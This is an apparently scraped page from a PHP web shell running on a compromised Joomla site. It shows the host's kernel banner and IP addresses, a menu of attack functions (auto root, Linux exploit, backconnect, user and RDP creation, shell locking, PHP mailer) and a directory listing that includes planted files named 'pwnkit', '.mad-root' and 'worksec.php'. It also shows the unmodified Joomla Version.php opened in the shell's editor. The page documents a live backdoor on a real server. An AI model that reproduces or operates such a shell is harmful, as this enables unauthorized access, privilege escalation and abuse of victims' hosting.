Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
libraries /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Access
[ DIR ]
drwxr-xr-x
Adapter
[ DIR ]
drwxr-xr-x
Application
[ DIR ]
drwxr-xr-x
Association
[ DIR ]
drwxr-xr-x
Authentication
[ DIR ]
drwxr-xr-x
Autoload
[ DIR ]
drwxr-xr-x
Button
[ DIR ]
drwxr-xr-x
Cache
[ DIR ]
drwxr-xr-x
Captcha
[ DIR ]
drwxr-xr-x
Categories
[ DIR ]
drwxr-xr-x
Changelog
[ DIR ]
drwxr-xr-x
Client
[ DIR ]
drwxr-xr-x
Component
[ DIR ]
drwxr-xr-x
Console
[ DIR ]
drwxr-xr-x
Crypt
[ DIR ]
drwxr-xr-x
Date
[ DIR ]
drwxr-xr-x
Dispatcher
[ DIR ]
drwxr-xr-x
Document
[ DIR ]
drwxr-xr-x
Editor
[ DIR ]
drwxr-xr-x
Encrypt
[ DIR ]
drwxr-xr-x
Environment
[ DIR ]
drwxr-xr-x
Error
[ DIR ]
drwxr-xr-x
Event
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
Extension
[ DIR ]
drwxr-xr-x
Feed
[ DIR ]
drwxr-xr-x
Fields
[ DIR ]
drwxr-xr-x
Filesystem
[ DIR ]
drwxr-xr-x
Filter
[ DIR ]
drwxr-xr-x
Form
[ DIR ]
drwxr-xr-x
HTML
[ DIR ]
drwxr-xr-x
Help
[ DIR ]
drwxr-xr-x
Helper
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
Image
[ DIR ]
drwxr-xr-x
Input
[ DIR ]
drwxr-xr-x
Installer
[ DIR ]
drwxr-xr-x
Language
[ DIR ]
drwxr-xr-x
Layout
[ DIR ]
drwxr-xr-x
Log
[ DIR ]
drwxr-xr-x
MVC
[ DIR ]
drwxr-xr-x
Mail
[ DIR ]
drwxr-xr-x
Menu
[ DIR ]
drwxr-xr-x
Microdata
[ DIR ]
drwxr-xr-x
Object
[ DIR ]
drwxr-xr-x
Pagination
[ DIR ]
drwxr-xr-x
Pathway
[ DIR ]
drwxr-xr-x
Plugin
[ DIR ]
drwxr-xr-x
Profiler
[ DIR ]
drwxr-xr-x
Response
[ DIR ]
drwxr-xr-x
Router
[ DIR ]
drwxr-xr-x
Schema
[ DIR ]
drwxr-xr-x
Serializer
[ DIR ]
drwxr-xr-x
Service
[ DIR ]
drwxr-xr-x
Session
[ DIR ]
drwxr-xr-x
String
[ DIR ]
drwxr-xr-x
Table
[ DIR ]
drwxr-xr-x
Tag
[ DIR ]
drwxr-xr-x
Toolbar
[ DIR ]
drwxr-xr-x
Tree
[ DIR ]
drwxr-xr-x
UCM
[ DIR ]
drwxr-xr-x
Updater
[ DIR ]
drwxr-xr-x
Uri
[ DIR ]
drwxr-xr-x
User
[ DIR ]
drwxr-xr-x
Utility
[ DIR ]
drwxr-xr-x
Versioning
[ DIR ]
drwxr-xr-x
WebAsset
[ DIR ]
drwxr-xr-x
Workflow
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Factory.php
21.49
KB
-rw----r--
Version.php
6.47
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Version.php
<?php /** * Joomla! Content Management System * * @copyright (C) 2005 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\CMS; \defined('JPATH_PLATFORM') or die; use Joomla\CMS\Date\Date; use Joomla\CMS\Helper\LibraryHelper; /** * Version information class for the Joomla CMS. * * @since 1.0 */ final class Version { /** * Product name. * * @var string * @since 3.5 */ const PRODUCT = 'Joomla!'; /** * Major release version. * * @var integer * @since 3.8.0 */ const MAJOR_VERSION = 4; /** * Minor release version. * * @var integer * @since 3.8.0 */ const MINOR_VERSION = 0; /** * Patch release version. * * @var integer * @since 3.8.0 */ const PATCH_VERSION = 3; /** * Extra release version info. * * This constant when not empty adds an additional identifier to the version string to reflect the development state. * For example, for 3.8.0 when this is set to 'dev' the version string will be `3.8.0-dev`. * * @var string * @since 3.8.0 */ const EXTRA_VERSION = ''; /** * Development status. * * @var string * @since 3.5 */ const DEV_STATUS = 'Stable'; /** * Code name. * * @var string * @since 3.5 */ const CODENAME = 'Furaha'; /** * Release date. * * @var string * @since 3.5 */ const RELDATE = '12-September-2021'; /** * Release time. * * @var string * @since 3.5 */ const RELTIME = '10:39'; /** * Release timezone. * * @var string * @since 3.5 */ const RELTZ = 'GMT'; /** * Copyright Notice. * * @var string * @since 3.5 */ const COPYRIGHT = '(C) 2005 Open Source Matters, Inc. <https://www.joomla.org>'; /** * Link text. * * @var string * @since 3.5 */ const URL = '<a href="https://www.joomla.org">Joomla!</a> is Free Software released under the GNU General Public License.'; /** * Check if we are in development mode * * @return boolean * * @since 3.4.3 */ public function isInDevelopmentState(): bool { return strtolower(self::DEV_STATUS) !== 'stable'; } /** * Compares two a "PHP standardized" version number against the current Joomla version. * * @param string $minimum The minimum version of the Joomla which is compatible. * * @return boolean True if the version is compatible. * * @link https://www.php.net/version_compare * @since 1.0 */ public function isCompatible(string $minimum): bool { return version_compare(JVERSION, $minimum, 'ge'); } /** * Method to get the help file version. * * @return string Version suffix for help files. * * @since 1.0 */ public function getHelpVersion(): string { return '.' . self::MAJOR_VERSION . self::MINOR_VERSION; } /** * Gets a "PHP standardized" version string for the current Joomla. * * @return string Version string. * * @since 1.5 */ public function getShortVersion(): string { $version = self::MAJOR_VERSION . '.' . self::MINOR_VERSION . '.' . self::PATCH_VERSION; if (!empty(self::EXTRA_VERSION)) { $version .= '-' . self::EXTRA_VERSION; } return $version; } /** * Gets a version string for the current Joomla with all release information. * * @return string Complete version string. * * @since 1.5 */ public function getLongVersion(): string { return self::PRODUCT . ' ' . $this->getShortVersion() . ' ' . self::DEV_STATUS . ' [ ' . self::CODENAME . ' ] ' . self::RELDATE . ' ' . self::RELTIME . ' ' . self::RELTZ; } /** * Returns the user agent. * * @param string $suffix String to append to resulting user agent. * @param bool $mask Mask as Mozilla/5.0 or not. * @param bool $addVersion Add version afterwards to component. * * @return string User Agent. * * @since 1.0 */ public function getUserAgent(string $suffix = '', bool $mask = false, bool $addVersion = true): string { if ($suffix === '') { $suffix = 'Framework'; } if ($addVersion) { $suffix .= '/' . self::MAJOR_VERSION . '.' . self::MINOR_VERSION; } // If masked pretend to look like Mozilla 5.0 but still identify ourselves. return ($mask ? 'Mozilla/5.0 ' : '') . self::PRODUCT . '/' . $this->getShortVersion() . ($suffix ? ' ' . $suffix : ''); } /** * Generate a media version string for assets * Public to allow third party developers to use it * * @return string * * @since 3.2 */ public function generateMediaVersion(): string { return md5($this->getLongVersion() . Factory::getApplication()->get('secret') . (new Date)->toSql()); } /** * Gets a media version which is used to append to Joomla core media files. * * This media version is used to append to Joomla core media in order to trick browsers into * reloading the CSS and JavaScript, because they think the files are renewed. * The media version is renewed after Joomla core update, install, discover_install and uninstallation. * * @return string The media version. * * @since 3.2 */ public function getMediaVersion(): string { // Load the media version and cache it for future use static $mediaVersion = null; if ($mediaVersion === null) { // Get the joomla library params and the media version $mediaVersion = LibraryHelper::getParams('joomla')->get('mediaversion', ''); // Refresh assets in debug mode or when the media version is not set if (JDEBUG || empty($mediaVersion)) { $mediaVersion = $this->generateMediaVersion(); $this->setMediaVersion($mediaVersion); } } return $mediaVersion; } /** * Function to refresh the media version * * @return Version Instance of $this to allow chaining. * * @since 3.2 */ public function refreshMediaVersion(): Version { return $this->setMediaVersion($this->generateMediaVersion()); } /** * Sets the media version which is used to append to Joomla core media files. * * @param string $mediaVersion The media version. * * @return Version Instance of $this to allow chaining. * * @since 3.2 */ public function setMediaVersion(string $mediaVersion): Version { // Do not allow empty media versions if (!empty($mediaVersion)) { // Get the params ... $params = LibraryHelper::getParams('joomla'); // ... set the media version ... $params->set('mediaversion', $mediaVersion); // ... and save the modified params LibraryHelper::saveParams('joomla', $params); } return $this; } }
Close